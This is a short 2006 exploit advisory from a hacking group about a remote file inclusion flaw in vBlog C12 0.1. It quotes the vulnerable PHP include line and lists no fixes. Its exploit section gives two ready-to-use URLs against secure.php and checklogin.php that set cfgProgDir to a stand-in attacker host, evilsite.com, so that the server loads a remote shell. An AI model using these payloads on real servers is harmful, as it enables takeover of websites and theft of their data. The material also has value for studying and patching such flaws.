vBlog - C12 0.1 (cfgProgDir) Remote File Include Vulnerabilities

2006-11-08 00:00:00

**********************************************************************************************************
WwW.Deltahacking.NeT (Priv8 Site)
WwW.Deltahacking.Ir (Public Site)
**********************************************************************************************************

* Portal Name :Vortex Blog AKA vBlog

* Class = Remote File Inclusion ;

* Download =http://switch.dl.sourceforge.net/sourceforge/c12/C12_a0.1_nonfunc.zip

* Found by = Dr.Pantagon ([email protected])

--------------------------------------------------------------------------------------------

--------------
- Vulnerable Code

include($cfgProgDir . "session.php");

++++++++++++++++++++++++++++++++++++++++++++

- Exploit:


http://[target]/[path]/admin/auth/secure.php?cfgProgDir=http://evilsite.com/shell?
http://[target]/[path]/admin/auth/checklogin.php?cfgProgDir=http://evilsite.com/shell?


--------------------------------------------------------------------------------------------

--------------

Special Thanks : Dr.Trojan , Hiv++ , D_7j , Lord
Special Thanks To Best My Friend : Tanha

**********************************************************************************************************

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.